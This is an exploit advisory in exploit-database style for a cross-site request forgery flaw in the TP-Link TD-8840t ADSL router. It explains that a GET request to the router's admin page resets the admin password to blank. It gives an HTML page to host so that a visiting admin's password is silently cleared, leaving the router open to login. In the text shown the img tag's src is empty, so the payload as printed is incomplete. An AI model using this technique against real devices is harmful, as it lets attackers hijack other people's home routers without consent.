# Exploit Title: TP-Link TD-8840t CSRF Vulnerability
# E-mail: mohammed.sec2010@gmail.com(www.facebook.com/mohammed.alsaggaf2010)
# Category: Hardware
# Google Dork: N/A
# Vendor: http://www.tp-link.com
# Firmware Version: 3.0.0 Build 120531
# Product: http://www.tp-link.com/en/products/details/?model=td-8840t
# Tested on: Windows 8 64-bit

TP-Link TD-8840t is a ADSL2+ Ethernet/USB Modem Router which works with a
24-Mbps  downstream connection.

#Description of Vulnerability
You can easily change the default user's (admin) password by the default
router page listning on tcp/ip port 80. In here you the $_GET will change
the password for you and the $_POST request method is not needed for
changing the router pass.


<!-- TP-Link TD-8840t CSRF Exploit -->
<img src=""/>

Save this as csrf.html and this will change the router password to blank if
the current user admin visits this page his password will be resetted to
blank. You can login with the username admin and password (blank).

#Greetz to: Gehad.hilal
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TP-Link TD-8840t – CSRF Vulnerability
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